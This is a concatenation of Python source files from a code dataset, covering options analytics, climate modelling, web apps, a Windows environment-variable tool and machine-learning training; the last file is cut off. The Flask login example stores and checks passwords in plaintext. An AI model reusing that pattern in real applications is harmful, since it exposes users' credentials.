pd.eval('pcr' + direction[i] + str(thresh[i])) \r\n \r\n if v=='openinterest':\r\n oi_series = grouped['openinterest'].mean()\r\n if log_trans: oi_series = np.log(oi_series)\r\n oi_rollingmean = oi_series.rolling(window,min_periods=1).mean().shift()\r\n oi_rollingstd = oi_series.rolling(window,min_periods=1).std().shift()\r\n oi_thresh = oi_rollingmean + oi_rollingstd*thresh[i]\r\n cond = pd.eval('oi_series' + direction[i] + 'oi_thresh')\r\n \r\n if v=='impliedvol':\r\n iv_series = grouped['impliedvol'].mean()\r\n iv_rolling = iv_series.rolling(window).quantile(thresh[i], interpolation='linear').shift()\r\n cond = pd.eval('iv_series' + direction[i] + 'iv_rolling')\r\n conditions.append(cond)\r\n \r\n dates = pd.concat(conditions, axis=1).all(axis=1)\r\n dates = dates[dates==1].index\r\n return dates\r\n \r\n def outlier_impact(self, df, outlier_date, win_thresh, verbose=True):\r\n price_series = df.groupby('quotedate')['underlying_last'].first()\r\n\r\n outlier_date_index = np.argwhere(np.in1d(price_series.index,outlier_date)).reshape(-1) \r\n next_day_index = np.clip(outlier_date_index + 1, 0, len(price_series)-1)\r\n next_5day_index = np.clip(outlier_date_index + 5, 0, len(price_series)-1)\r\n\r\n a = price_series[outlier_date_index].reset_index(drop=True)\r\n b = price_series[next_day_index].reset_index(drop=True)\r\n c = price_series[next_5day_index].reset_index(drop=True)\r\n \r\n next_day_return = np.log(b/a) \r\n next_5thday_return = np.log(c/a)\r\n avg_5thday_winprob = round((next_5thday_return>win_thresh).mean(),3)\r\n avg_5thday_posreturn = round(next_5thday_return[next_5thday_return>0].mean(),3)\r\n avg_5thday_negreturn = round(next_5thday_return[next_5thday_return<0].mean(),3)\r\n avg_5thday_expreturn = avg_5thday_posreturn*avg_5thday_winprob + avg_5thday_negreturn*(1-avg_5thday_winprob)\r\n \r\n output = pd.concat([a,b,c,next_5thday_return],axis=1)\r\n output.index = outlier_date\r\n output.columns = ['outlierday','nextday','5thday','5thday_return']\r\n\r\n if verbose:\r\n print('+1 day stock price increase probability:', round((next_day_return>win_thresh).mean(),3))\r\n print('+1 day stock price avg increase:', round(next_day_return[next_day_return>0].mean(),3))\r\n print('+1 day stock price avg decrease', round(next_day_return[next_day_return<0].mean(),3),'\\n')\r\n print('+5 day stock price increase probability:', avg_5thday_winprob)\r\n print('+5 day stock price avg increase:', avg_5thday_posreturn)\r\n print('+5 day stock price avg decrease:', avg_5thday_negreturn)\r\n print('+5 day expected return:', avg_5thday_expreturn,'\\n')\r\n return output\r\n \r\n else:\r\n return avg_5thday_winprob, len(output), avg_5thday_posreturn, avg_5thday_negreturn, avg_5thday_expreturn\r\n\r\n def record_to_df(self, record_list):\r\n variable = self._params['variable']\r\n performance = pd.DataFrame(record_list, columns=['winprob','outliernum','posret','negret','expret','/'.join(variable)])\r\n return performance\r\n\r\n def optimize_threshold(self, win_thresh):\r\n l = []\r\n for i, thresh in enumerate(itertools.product(*self._thresh_dic.values())):\r\n outlier = self.anomaly_dates(self._train_contract,thresh)\r\n stats = self.outlier_impact(self._train_contract, outlier, win_thresh=win_thresh, verbose=False)\r\n l.append([*stats, np.around(thresh,2)])\r\n if i%500 == 0:\r\n print(f'Testing {i}th combo')\r\n \r\n performance = self.record_to_df(l)\r\n return performance\r\n\r\n ##################################################################################\r\n #------------------------------- helper functions -------------------------------#\r\n ##################################################################################\r\n def pcratio(self, df):\r\n \"\"\"\r\n return put-call ratio by date\r\n \"\"\"\r\n ratio = df[df['type']=='put'].groupby('quotedate')['volume'].sum() / df[df['type']=='call'].groupby('quotedate')['volume'].sum()\r\n ratio.name = 'pcratio'\r\n return ratio\r\n\r\n def preprocess(self, df):\r\n \"\"\"\r\n add pcratio column to df\r\n \"\"\"\r\n pcratio = self.pcratio(df)\r\n return pd.merge(df, pcratio, how='left', left_on='quotedate', right_index=True)\r\n\r\n #contract filters\r\n def no_mask(self, df):\r\n return np.ones(len(df),dtype=bool)\r\n\r\n def type_contract(self, df):\r\n \"\"\"\r\n return call/put filter\r\n \"\"\"\r\n if self._type is None:\r\n return self.no_mask(df)\r\n else:\r\n return df['type']==self._type\r\n\r\n def expiry_contract(self, df):\r\n \"\"\"\r\n return expiry in current/next/3rd month filter\r\n \"\"\"\r\n if self._type is None:\r\n return self.no_mask(df)\r\n else:\r\n expiration, quotedate = df['expiration'], df['quotedate']\r\n expr_month = expiration.dt.year * 12 + expiration.dt.month\r\n quote_month = quotedate.dt.year * 12 + quotedate.dt.month\r\n if self._expiry == 'cur':\r\n return expr_month == quote_month\r\n if self._expiry == 'next':\r\n return expr_month - quote_month == 1\r\n if self._expiry == 'third':\r\n return expr_month - quote_month == 2\r\n\r\n def monthly_contract(self, df):\r\n \"\"\"\r\n return monthly/non-monthly filter\r\n \"\"\"\r\n if self._type is None:\r\n return self.no_mask(df)\r\n else:\r\n expiration= df['expiration']\r\n third_friday = (expiration.dt.day >=15) & (expiration.dt.day <= 21) & (expiration.dt.weekday == 4)\r\n if self._monthly:\r\n return third_friday\r\n else:\r\n return ~third_friday\r\n\r\n def moneyness_contract(self, df):\r\n \"\"\"\r\n return atm/otm/itm filter\r\n \"\"\"\r\n if self._type is None:\r\n return self.no_mask(df)\r\n else:\r\n delta = df['delta']\r\n if self._moneyness == 'atm':\r\n return (abs(delta) >= self._atm_delta[0]) & (abs(delta) <= self._atm_delta[1])\r\n if self._moneyness == 'otm':\r\n return abs(delta) < self._otm_delta\r\n if self._moneyness == 'itm':\r\n return abs(delta) > self._itm_delta","repo_name":"liweidong1218/Trading-tools","sub_path":"Signals/Option anomaly detection/anomaly_detection_class.py","file_name":"anomaly_detection_class.py","file_ext":"py","file_size_in_byte":10474,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19269506931","text":"import pandas as pd\nimport numpy as np\nimport os\n\nimport forcing_total\nimport doeclimF\n\nif not os.path.exists('data/'):\n print(\"FATAL ERROR: No data directory\")\n exit()\n\nif not os.path.exists('output/'):\n os.makedirs('output/')\n\nforcing = pd.read_csv( 'data/forcing_hindcast.csv')\nmod_time = forcing['year']\n\nclimate_sensitivity = 3.1\nocean_vertical_diffusivity = 3.5\naerosol_scaling = 1.1\n\nforcingtotal = forcing_total.forcing_total(forcing=forcing, alpha_doeclim=aerosol_scaling, l_project=False, begyear=mod_time[0], endyear=np.max(mod_time))\n\ndoeclim_out = doeclimF.doeclimF(forcingtotal, mod_time, S=climate_sensitivity, kappa=ocean_vertical_diffusivity)\n\ndoeclim_out.to_csv('output/doeclim_output.csv')","repo_name":"niharnandan/thesis","sub_path":"doeclim_driver.py","file_name":"doeclim_driver.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14217520256","text":"import random\nimport copy\n# Consider using the modules imported above.\n\nclass Hat:\n def __init__(self, **kwargs):\n self.contents = list()\n self.initial_count = 0\n for key, value in kwargs.items():\n for i in range(value):\n self.initial_count += 1\n self.contents.append(key)\n\n\n def draw(self, num):\n chosen = list()\n\n try:\n for i in range(num):\n index = random.randint(0, len(self.contents) - 1) if len(self.contents) - 1 > 0 else 0\n chosen.append(self.contents[index])\n self.contents.pop(index)\n except IndexError:\n return chosen\n \n return chosen\n\n\n\n# This module has some poor data structure choices, but they were required by the instructions.\n# Otherwise, the tests might not pass.\ndef experiment(hat, expected_balls, num_balls_drawn, num_experiments):\n successes = 0\n \n for i in range(num_experiments):\n expected = expected_balls.copy()\n drawn = copy.deepcopy(hat).draw(num_balls_drawn)\n for ball in drawn:\n if ball in expected.keys():\n expected[ball] -= 1\n if expected[ball] == 0:\n del expected[ball]\n if not bool(expected): # If the dictionary is empty it will evaluate to false\n successes += 1\n break\n\n return successes / num_experiments","repo_name":"dangarmol/python-scientific-computing-fcc","sub_path":"Probability Calculator/prob_calculator.py","file_name":"prob_calculator.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1127982942","text":"from http import HTTPStatus\n\nfrom flask_restful import Resource, reqparse\nfrom flask_jwt_extended import get_current_user, jwt_required\n\nfrom app.models import SocialAccount\n\nremove_social_account = reqparse.RequestParser()\nremove_social_account.add_argument(\n \"social_name\", dest=\"social_name\", location=\"json\", required=True, type=str, help=\"Name of social service.\"\n)\n\n\nclass RemoveSocialAccount(Resource):\n \"\"\"\n Класс ручки для открепления соц сервиса от аккаунта.\n \"\"\"\n\n @jwt_required()\n def post(self):\n social_name = remove_social_account.parse_args().get(\"social_name\")\n user = get_current_user()\n social_account = SocialAccount.query.filter_by(user_id=user.id, social_name=social_name).one_or_none()\n if not social_account:\n return {\"message\": \"no social account\"}, HTTPStatus.CONFLICT\n social_account.delete()\n return HTTPStatus.OK\n","repo_name":"UtkinVadim/Auth_sprint_2","sub_path":"src/app/api/remove_social_account.py","file_name":"remove_social_account.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39795673020","text":"import sys\nimport argparse\nfrom ctwin32 import (\n ctypes,\n user,\n advapi,\n shell,\n HWND_BROADCAST,\n WM_SETTINGCHANGE,\n SMTO_NORMAL,\n REG_SZ,\n REG_EXPAND_SZ,\n KEY_READ,\n KEY_WRITE,\n )\n\n################################################################################\n\ndef env_var_root(system=False, access=KEY_READ):\n if system:\n pth = r\"SYSTEM\\CurrentControlSet\\Control\\Session Manager\"\n return advapi.RegOpenKeyEx(advapi.HKLM, pth, access)\n else:\n return advapi.HKCU\n\n################################################################################\n\ndef env_var_key(root, access=KEY_READ):\n return advapi.RegOpenKeyEx(root, \"Environment\", access)\n\n################################################################################\n\ndef is_persistent_env_var(name, system=False):\n with env_var_root(system) as root:\n with env_var_key(root) as key:\n result = False\n try:\n val, typ = advapi.RegQueryValueEx(key, name)\n result = (typ in (REG_SZ, REG_EXPAND_SZ)) and bool(val)\n except OSError:\n pass\n return result\n\n################################################################################\n\ndef broadcast_env_change():\n estr = ctypes.create_unicode_buffer(\"Environment\")\n user.SendMessageTimeout(\n HWND_BROADCAST,\n WM_SETTINGCHANGE,\n 0,\n ctypes.addressof(estr),\n SMTO_NORMAL,\n 500\n )\n\n################################################################################\n\ndef persist_env_var(name, value, system=False, do_broadcast=False):\n access = KEY_WRITE | KEY_READ\n with env_var_root(system, access) as root:\n with env_var_key(root, access) as key:\n if not value:\n advapi.RegDeleteValue(key, name)\n else:\n advapi.reg_set_str(key, name, value)\n if do_broadcast:\n broadcast_env_change()\n\n################################################################################\n\ndef persist_user_env_block(nv_dict, system=False):\n for n, v in nv_dict.items():\n persist_env_var(n, v, system, False)\n broadcast_env_change()\n\n################################################################################\n\ndef get_env_block(system=False):\n result = {}\n with env_var_root(system) as root:\n with env_var_key(root, KEY_READ) as key:\n for name, value, typ in advapi.reg_enum_values(key):\n if typ in (REG_SZ, REG_EXPAND_SZ):\n result[name] = value\n return result\n\n################################################################################\n\ndef parse_args():\n ape = argparse.ArgumentParser(\n description=\"set environment variables persistently (like setx)\"\n )\n ape.add_argument(\n \"-s\",\n \"--system\",\n action=\"store_true\",\n help=\"set system variable (as opposed to user variable)\"\n )\n ape.add_argument(\n \"-v\",\n \"--verbose\",\n action=\"store_true\",\n help=\"print final variables\"\n )\n ape.add_argument(\"name\", help=\"name of variable\")\n ape.add_argument(\n \"value\",\n help=\"value of variable (omitting it will delete the variable)\",\n nargs=\"?\",\n default=\"\",\n )\n return ape.parse_args()\n\n################################################################################\n\ndef main(name, value, system, verbose):\n persist_env_var(name, value, system, True)\n if verbose:\n print(f\"variables for {'system' if args.system else 'user'}:\")\n for name, value in get_env_block(args.system).items():\n print(f\" {name} = {value}\")\n\n################################################################################\n\nif __name__ == \"__main__\":\n args = parse_args()\n\n # Setting system variables requires administrative privileges.\n if args.system and not advapi.running_as_admin():\n shell.elevate(sys.executable, *sys.argv)\n else:\n main(args.name, args.value, args.system, args.verbose)\n\n################################################################################\n","repo_name":"RoccoMatano/ctwin32","sub_path":"samples/senv.py","file_name":"senv.py","file_ext":"py","file_size_in_byte":4201,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"2961750459","text":"#!/usr/bin/env python3\n\nimport json\nimport os\nfrom typing import TYPE_CHECKING, Any, Dict, List, Optional, Sequence\n\nimport attr\nfrom habitat.core.registry import registry\nfrom habitat.core.simulator import AgentState, ShortestPathPoint\nfrom habitat.core.utils import DatasetFloatJSONEncoder\nfrom habitat.datasets.pointnav.pointnav_dataset import (\n CONTENT_SCENES_PATH_FIELD,\n DEFAULT_SCENE_PATH_PREFIX,\n PointNavDatasetV1,\n)\nfrom habitat.tasks.nav.object_nav_task import (\n ObjectGoal,\n ObjectGoalNavEpisode,\n ObjectViewLocation,\n)\n\nif TYPE_CHECKING:\n from omegaconf import DictConfig\n\n\n@attr.s(auto_attribs=True)\nclass OVONObjectViewLocation(ObjectViewLocation):\n r\"\"\"OVONObjectViewLocation\n\n Args:\n raidus: radius of the circle\n \"\"\"\n radius: Optional[float] = None\n\n\n@attr.s(auto_attribs=True, kw_only=True)\nclass OVONEpisode(ObjectGoalNavEpisode):\n r\"\"\"OVON Episode\n\n :param children_object_categories: Category of the object\n \"\"\"\n children_object_categories: Optional[List[str]] = []\n\n @property\n def goals_key(self) -> str:\n r\"\"\"The key to retrieve the goals\"\"\"\n return f\"{os.path.basename(self.scene_id)}_{self.object_category}\"\n\n\n@registry.register_dataset(name=\"OVON-v1\")\nclass OVONDatasetV1(PointNavDatasetV1):\n r\"\"\"\n Class inherited from PointNavDataset that loads Open-Vocab\n Object Navigation dataset.\n \"\"\"\n episodes: List[OVONEpisode] = [] # type: ignore\n content_scenes_path: str = \"{data_path}/content/{scene}.json.gz\"\n goals_by_category: Dict[str, Sequence[ObjectGoal]]\n\n @staticmethod\n def dedup_goals(dataset: Dict[str, Any]) -> Dict[str, Any]:\n if len(dataset[\"episodes\"]) == 0:\n return dataset\n\n goals_by_category = {}\n for i, ep in enumerate(dataset[\"episodes\"]):\n dataset[\"episodes\"][i][\"object_category\"] = ep[\"goals\"][0][\n \"object_category\"\n ]\n ep = OVONEpisode(**ep)\n\n goals_key = ep.goals_key\n if goals_key not in goals_by_category:\n goals_by_category[goals_key] = ep.goals\n\n dataset[\"episodes\"][i][\"goals\"] = []\n\n dataset[\"goals_by_category\"] = goals_by_category\n\n return dataset\n\n def to_json(self) -> str:\n for i in range(len(self.episodes)):\n self.episodes[i].goals = []\n\n result = DatasetFloatJSONEncoder().encode(self)\n\n for i in range(len(self.episodes)):\n goals = self.goals_by_category[self.episodes[i].goals_key]\n if not isinstance(goals, list):\n goals = list(goals)\n self.episodes[i].goals = goals\n\n return result\n\n def __init__(self, config: Optional[\"DictConfig\"] = None) -> None:\n self.goals_by_category = {}\n super().__init__(config)\n self.episodes = list(self.episodes)\n\n @staticmethod\n def __deserialize_goal(serialized_goal: Dict[str, Any]) -> ObjectGoal:\n g = ObjectGoal(**serialized_goal)\n\n for vidx, view in enumerate(g.view_points):\n view_location = OVONObjectViewLocation(**view) # type: ignore\n view_location.agent_state = AgentState(**view_location.agent_state) # type: ignore\n g.view_points[vidx] = view_location\n\n return g\n\n def from_json(\n self, json_str: str, scenes_dir: Optional[str] = None\n ) -> None:\n deserialized = json.loads(json_str)\n if CONTENT_SCENES_PATH_FIELD in deserialized:\n self.content_scenes_path = deserialized[CONTENT_SCENES_PATH_FIELD]\n\n if len(deserialized[\"episodes\"]) == 0:\n return\n\n if \"goals_by_category\" not in deserialized:\n deserialized = self.dedup_goals(deserialized)\n\n for k, v in deserialized[\"goals_by_category\"].items():\n self.goals_by_category[k] = [self.__deserialize_goal(g) for g in v]\n\n for i, episode in enumerate(deserialized[\"episodes\"]):\n episode = OVONEpisode(**episode)\n episode.episode_id = str(i)\n\n if scenes_dir is not None:\n if episode.scene_id.startswith(DEFAULT_SCENE_PATH_PREFIX):\n episode.scene_id = episode.scene_id[\n len(DEFAULT_SCENE_PATH_PREFIX) :\n ]\n\n episode.scene_id = os.path.join(scenes_dir, episode.scene_id)\n\n if episode.shortest_paths is not None:\n for path in episode.shortest_paths:\n for p_index, point in enumerate(path):\n if point is None or isinstance(point, (int, str)):\n point = {\n \"action\": point,\n \"rotation\": None,\n \"position\": None,\n }\n\n path[p_index] = ShortestPathPoint(**point)\n\n self.episodes.append(episode) # type: ignore [attr-defined]\n","repo_name":"naokiyokoyama/ovon","sub_path":"ovon/dataset/ovon_dataset.py","file_name":"ovon_dataset.py","file_ext":"py","file_size_in_byte":4968,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21316763707","text":"# 小蓝拥有×大小的棋盘,一开始棋盘上全都是白子。小蓝进行了\r\n# 次操作,每次操作会将棋盘上某个范围内的所有棋子的颜色取反\r\n# (也就是白色棋子变为黑色,黑色棋子变为白色)。请输出所有操作\r\n# 做完后棋盘上每个棋子的颜色。\r\n# 输入格式\r\n# 输入的第一行包含两个整数几,m,用一个空格分隔,表示棋盘大小\r\n# 与操作数。\r\n# 接下来m行每行包含四个整数x1,y1,x2,y2,相邻整数之间使用\r\n# 一个空格分隔,表示将在x1至x2行和y1至y2列中的棋子颜色取\r\n# 反。\r\n# 输出格式\r\n# 输出几行,每行个0或1表示该位置棋子的颜色。如果是白色则\r\n# 输出0,否则输出1。\r\n# 这段代码会超时,下面使用差分方法进行优化\r\n# n,m = map(int,input().split())\r\n# chessboard = [[0]*n for _ in range(n)]\r\n# for _ in range(m):\r\n# x1,y1,x2,y2 = map(int,input().split())\r\n# for i in range(x1-1,x2):\r\n# for j in range(y1-1,y2):\r\n# chessboard[i][j] = 1 - chessboard[i][j]\r\n# for row in chessboard:\r\n# print(''.join(map(str, row)))\r\nn, m = map(int, input().split())\r\n# 初始化一个全为0的(n + 1) x (n + 1)的二维数组来表示差分数组\r\ndiff = [[0] * (n + 2) for _ in range(n + 2)]\r\n# 执行m次操作\r\nfor _ in range(m):\r\n x1, y1, x2, y2 = map(int, input().split())\r\n # 更新差分数组的操作范围\r\n diff[x1][y1] += 1\r\n diff[x1][min(y2 + 1, n + 1)] -= 1\r\n diff[min(x2 + 1, n + 1)][y1] -= 1\r\n diff[min(x2 + 1, n + 1)][min(y2 + 1, n + 1)] += 1\r\n# 计算最终棋盘状态\r\nfor i in range(1, n + 1):\r\n for j in range(1, n + 1):\r\n diff[i][j] += diff[i][j - 1] + diff[i - 1][j] - diff[i - 1][j - 1]\r\n # 棋盘上该位置为偶数时为0,奇数时为1\r\n print(1 if diff[i][j] % 2 == 1 else 0, end='')\r\n print()","repo_name":"Ww0225/pythonTest","sub_path":"棋盘.py","file_name":"棋盘.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74477081767","text":"from django.urls import path\nfrom . import views\n\napp_name = 'todo'\n\nurlpatterns = [\n path('vonly/', views.TodoVueOnlyTV.as_view(), name=\"vonly\"), # TemplateView\n\n path('create/', views.TodoCV.as_view(), name=\"create\"), # CreateView\n path('list/', views.TodoLV.as_view(), name=\"list\"), # ListView\n path('/delete/', views.TodoDelV.as_view(), name=\"delete\"), # DeleteView\n\n path('mixin/', views.TodoMOMCV.as_view(), name=\"mixin\"), # MultipleObjectMixin, CreateView\n path('/delete2/', views.TodoDelV2.as_view(), name=\"delete2\"), # DeleteView\n]\n","repo_name":"HRPzz/Vue_and_Django","sub_path":"01_Vue2cdn_Bootstrap4cdn_Django2/02_DjTodo/todo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21037237739","text":"from flask import Flask, render_template, request\n\napp = Flask(__name__)\n\nfrom pymongo import MongoClient\n\nclient = MongoClient('localhost', 27017)\ndb = client.dbprac\n\n\n# GET -> 페이지 / POST(id,pw) -> 로그인\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if request.method == 'GET':\n return render_template('login.html')\n else:\n # id,pw 를 POST 의 body 에서 받습니다.\n id = request.form['id']\n pw = request.form['pw']\n\n # id와 pw가 둘다 일치하는 데이터를 찾습니다.\n db_id = db.users.find_one({'id': id, 'pw': pw}, {'_id': False})\n\n # db_id가 존재한다면\n if db_id is not None:\n return \"로그인을 성공하였습니다\"\n\n # db_id가 존재하지 않는다면\n else:\n return \"아이디 또는 패스워드를 확인하세요\"\n\n\n# POST(id,pw) -> 회원가입\n@app.route('/signup', methods=['POST'])\ndef signup():\n # id,pw 를 POST 의 body 에서 받습니다.\n id = request.form['id']\n pw = request.form['pw']\n\n # id 가 일치하는 데이터를 찾습니다.\n db_id = db.users.find_one({'id': id}, {'_id': False})\n\n # id 가 일치하는 데이터가 존재한다면\n if db_id is not None:\n print(\"이미 존재하는 아이디입니다\")\n\n # 아니라면 아이디를 저장합니다.\n else:\n db.users.insert_one({'id': id, 'pw': pw})\n print(\"회원가입이 완료되었습니다\")\n\n\nif __name__ == '__main__':\n app.run('0.0.0.0', port=5000, debug=True)\n","repo_name":"skylermbang/Lectures-","sub_path":"hanghae99/project/dailyreport/app (1).py","file_name":"app (1).py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71870715047","text":"# younesbelabid@yahoo.com #\n\nclass Pizza:\n def __init__(self, nom, prix,ingredients, vegetarienne = False):\n self.nom = nom\n self.prix = prix\n self.ingredients = ingredients\n self.vegetarienne = vegetarienne\n\n def afficher(self):\n print()\n veg_str = \"\"\n if self.vegetarienne:\n veg_str = \"- végétarienne\"\n print(\"la pizza est une\", self.nom, \"son prix est\", self.prix, \"$\", veg_str)\n print(\" - \".join(self.ingredients))\n print()\n\nclass Pizzapersonnalisee(Pizza):\n PRIX_DE_BASE = 7\n PRIX_PAR_INGREDIENT = 1.1\n dernier_numero = 0\n def __init__(self):\n Pizzapersonnalisee.dernier_numero +=1\n self.numero = Pizzapersonnalisee.dernier_numero\n super().__init__(\"Personnalisée \" + str(self.numero),0,[]) # -->\n self.demander_ingredients_utilisateur()\n self.calculer_prix_pizza()\n\n\n def demander_ingredients_utilisateur(self):\n print()\n print(\"Ingrédients de la pizza \" + str(self.numero))\n while True:\n ingredient = input(\"Ajouter un ingredient (Enter pour terminer) : \")\n if ingredient == \"\":\n return\n self.ingredients.append(ingredient)\n print(f\"vous avez {len(self.ingredients)}, ingrédients : {' - '.join(self.ingredients)}\")\n\n def calculer_prix_pizza(self):\n prix_tot_ingredients = self.PRIX_PAR_INGREDIENT * len(self.ingredients)\n self.prix = self.PRIX_DE_BASE + prix_tot_ingredients\n \n\npizzas = [\n Pizza(\"4 fromages\", 8.5,(\"brie\",\"emmental\",\"compté\",\"parmesan\"), True),\n Pizza(\"Royales\", 12.0,(\"brie\",\"oignons\",\"merguez\",\"champignos\")),\n Pizza(\"Orientale\", 11.0,(\"oeuf\",\"emmental\",\"sauce tomate\",\"jambon\")),\n Pizza(\"4 saisons\", 13.0,(\"brie\",\"sauce tomate\",\"viande hachée\",\"parmesan\")),\n Pizza(\"Végétarienne\", 9.0,(\"brie\",\"sauce tomate\",\"champignos\",\"parmesan\"), True),\n Pizzapersonnalisee(),\n Pizzapersonnalisee()\n ]\n\n\nfor pizza in pizzas:\n pizza.afficher()\n","repo_name":"Aliouatte/Programmation_orient-_objet","sub_path":"main_1.py","file_name":"main_1.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18983040867","text":"\"\"\"\n이분 탐색 (binary_search)\n예제5. n개의 오름차순 정수로 이루어진 리스트가 주어졌을 때\nk가 존재하면 1, 존재하지 않으면 0을 출력한다.\n\"\"\"\n\nimport sys\n\ndef solution(n_list, k):\n fount = False\n left = 0\n right = len(n_list)-1\n result = 0\n result_idx = ''\n\n while left <= right:\n mid = (left + right) // 2\n if k == n_list[mid]:\n result = n_list[mid]\n result_idx = f'idx: {mid}'\n found = True\n break\n elif k < n_list[mid]:\n right = mid - 1\n elif k > n_list[mid]:\n left = mid + 1\n \n if fount:\n print(result, result_idx)\n return 1\n else:\n print(result, result_idx)\n return 0\n\ndef init():\n n, k = map(int, sys.stdin.readline().split())\n n_list = list(map(int, sys.stdin.readline().split()))\n print(solution(n_list, k))\n\ninit()","repo_name":"kkojae91/algorithm_prac","sub_path":"python_algorithm/code_lion/search_05.py","file_name":"search_05.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27364480995","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nplt.figure(figsize=(8,6))\nsalary = ('1500 or less','1500-3000','3000-4500','4500-6000','6000 or more')\nx_pos = np.arange(len(salary))\nfirst = [13,74,15,5,2]\ncurrent = [3,34,38,19,15]\nret1 = plt.bar(x_pos-0.1,first,0.2,color='b',alpha=0.8,label='first salary')\nret2 = plt.bar(x_pos+0.1,current,0.2,color='r',alpha=0.8,label='current salary')\nplt.xticks(x_pos,salary)\nplt.ylabel('The number of people')\nplt.title('First salary and current salary')\nplt.legend((ret1[0],ret2[0]),('first salary','current salary'))\ndef autolabel(rets):\n \"\"\"\n Attach a text label above each bar displaying its height\n \"\"\"\n for ret in rets:\n height = ret.get_height()\n plt.text(ret.get_x() + ret.get_width()/2.,1.01*height,'%d' % int(height), ha = 'center',va = 'bottom')\nautolabel(ret1)\nautolabel(ret2)\nplt.show()\n","repo_name":"daozl/james","sub_path":"code/bar/salary.py","file_name":"salary.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23672022838","text":"from enthought.pyface.api import ApplicationWindow, GUI\nfrom enthought.pyface.action.api import Action, MenuManager, MenuBarManager\nfrom enthought.pyface.action.api import StatusBarManager, ToolBarManager\n\n\nclass MainWindow(ApplicationWindow):\n \"\"\" The main application window. \"\"\"\n\n ###########################################################################\n # 'object' interface.\n ###########################################################################\n\n def __init__(self, **traits):\n \"\"\" Creates a new application window. \"\"\"\n\n # Base class constructor.\n super(MainWindow, self).__init__(**traits)\n\n # Create an action that exits the application.\n exit_action = Action(name='E&xit', on_perform=self.close)\n\n # Add a menu bar.\n self.menu_bar_manager = MenuBarManager(\n MenuManager(exit_action, name='&File')\n )\n\n # Add some tool bars.\n self.tool_bar_managers = [\n ToolBarManager(\n exit_action, name='Tool Bar 1', show_tool_names=False\n ),\n\n ToolBarManager(\n exit_action, name='Tool Bar 2', show_tool_names=False\n ),\n\n ToolBarManager(\n exit_action, name='Tool Bar 3', show_tool_names=False\n ),\n ]\n\n # Add a status bar.\n self.status_bar_manager = StatusBarManager()\n self.status_bar_manager.message = 'Example application window'\n \n return\n\n\n# Application entry point.\nif __name__ == '__main__':\n # Create the GUI (this does NOT start the GUI event loop).\n gui = GUI()\n\n # Create and open the main window.\n window = MainWindow()\n window.open()\n\n # Start the GUI event loop!\n gui.start_event_loop()\n\n##### EOF #####################################################################\n","repo_name":"fspaolo/misc-code","sub_path":"maps/build/TraitsGUI/examples/application_window.py","file_name":"application_window.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"27734910070","text":"from typing import Union\nfrom pathlib import Path\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torch.optim import Adam\nfrom torch.nn import L1Loss\nfrom torch.optim.lr_scheduler import ExponentialLR\n\nfrom core.model import CnnLSTM\n\nfrom settings import has_cuda\nfrom core.loss import *\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nsns.set_style(\"darkgrid\")\n\n\nclass CnnLstmTrainer:\n def __init__(self,time_step:int, out_conv_filters: int, conv_kernel: int, conv_padding: str, pool_size: int, pool_padding: str,\n lstm_hidden_unit: int, n_features: int, lr: float, loss: Union[L1Loss, RMSELoss, RLoss]):\n\n print(f\"[Model] Loading model\")\n self._model = CnnLSTM(out_conv_filters, conv_kernel, conv_padding, pool_size, pool_padding, lstm_hidden_unit,\n n_features,time_step=time_step)\n print(f\"[Model] model had been loaded\")\n\n if has_cuda:\n self._model.cuda()\n\n self._opt = Adam(self._model.parameters(), lr=lr)\n self._criterion = loss()\n self._criterion_name = self._criterion.__class__.__name__\n self._scheduler = ExponentialLR(self._opt, gamma=0.9)\n\n def train(self, train_loader: DataLoader, epochs: int, validation_loader: DataLoader,\n test_loader: Union[DataLoader, None], save_path: Path,\n scale: dict):\n print(f'[Train] Start to train')\n\n std = scale[\"std\"]\n mean = scale[\"mean\"]\n\n total_loss = []\n total_val_loss = []\n # total_acc = []\n\n # start update\n step = 0\n for epoch in range(epochs):\n\n tm_loss = []\n tm_val_loss = []\n # tm_acc = []\n\n # training proccess\n for idx, (x, y) in enumerate(train_loader):\n\n x = torch.transpose(x, dim0=1, dim1=2)\n\n # x_mean = torch.mean(x)\n # y_mean = torch.mean(y)\n #\n # x_std = torch.std(x)\n # y_std = torch.std(y)\n #\n # x = (x-x_mean)/x_std\n # y = (y-y_mean)/y_std\n\n if has_cuda:\n x = x.float().cuda()\n y = y.float().cuda()\n\n # # update\n self._opt.zero_grad()\n pred = self._model(x)\n # pred = pred*std+mean\n # y = y * std + mean\n loss = self._criterion(pred, y)\n loss.backward()\n 